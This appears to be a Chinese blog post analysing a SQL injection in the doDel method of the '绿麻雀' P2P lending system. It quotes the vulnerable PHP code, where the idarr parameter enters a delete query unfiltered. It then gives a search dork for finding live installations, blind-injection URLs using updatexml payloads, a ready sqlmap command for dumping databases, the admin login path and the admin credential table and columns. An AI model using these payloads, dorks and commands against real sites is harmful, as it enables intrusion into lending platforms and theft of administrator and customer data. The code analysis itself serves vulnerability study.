绿麻雀网贷系统通用注入分析

在安全脉搏上面看到的这个程序，虽说已经有文章了。但是对于小菜鸟的我还是想要尝试着分析一下下。学习学习。嘻嘻。

Action

---

先把源码抠过来。

漏洞文件:App\Lib\Action\HCommonAction.class.php

且看漏洞产生的关键位置：

<?php 
/**
 * 以上code省略...by:DEF
 */
public function doDel(){ #首先定义了一个删除的类

        $model = D($this->getActionName()); #引用getactionname

        if (!empty($model)) { #如果说$model不为空执行下面的语句否则不做任何操作。

            $id = $_REQUEST['idarr'];#漏洞产生地点！此处的idarr未经任何处理！就将其带入二十三行执行sql,进行删除数据，故由此引发sql注入

            if (isset($id)) {

                if (method_exists($this, '_doDelFilter')) {

                    $this->_doDelFilter($id);

                }

            

                if (false !== $model->where("id in ({$id})")->delete()) {

                    $this->success(L('删除成功'),'',$id);

                } else {

                    $this->error(L('删除失败'));

                }

            } else {

                $this->error('非法操作');

            }

        }

    }

 ?>

因为没有任何的输出，所以对待此类猪肉只能使用盲注。凡是继承了这个HCommonAction类的都存在这个sql漏洞。

 

以上文件都是继承了HCommonAction类的文件。

borrow,fund,dodel下的idarr参数都是可以注入的。

 PS:其实这个漏洞危害性还是有的。

 

inurl:member/common/register/
http://localhost/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)

可爆管理员后台：/App/Tpl/Admin/default/Index/login.html

sqlmap.py -u "https://www.xxxx.com/home/borrow/doDel/" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=6 --dbs

管理员默认的用户表:lzh_ausers下的user_name,user_pass,user_word

THE END

---